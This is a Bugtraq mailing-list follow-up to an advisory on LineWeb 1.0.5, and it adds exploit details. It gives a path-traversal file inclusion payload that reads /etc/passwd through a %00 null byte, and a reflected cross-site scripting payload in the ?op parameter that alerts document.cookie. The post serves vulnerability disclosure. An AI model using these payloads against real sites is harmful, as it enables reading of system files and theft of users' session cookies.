[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Multiple vulnerabilities in LineWeb 1.0.5

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Multiple vulnerabilities in LineWeb 1.0.5
From: ign.sec@xxxxxxxxx
Date: 6 Jan 2010 09:55:46 -0000

One thing i forgot, a %00 must be included at the end of the LFI, IE: 
index.php?op=../../../../../../../etc/passwd%00 

And ?op is vulnerable to a xss attack, IE:
index.php?op=<script>alert(document.cookie)</script>

Ignacio.

Prev by Date: [TOOL RELEASE] Microsoft SQL Server Fingerprint Too BETA-3l!!!
Next by Date: HTTP Digest Integrity: Another look, in light of recent attacks
Previous by thread: Multiple vulnerabilities in LineWeb 1.0.5
Next by thread: [ MDVSA-2009:220-1 ] davfs
Index(es):
- Date
- Thread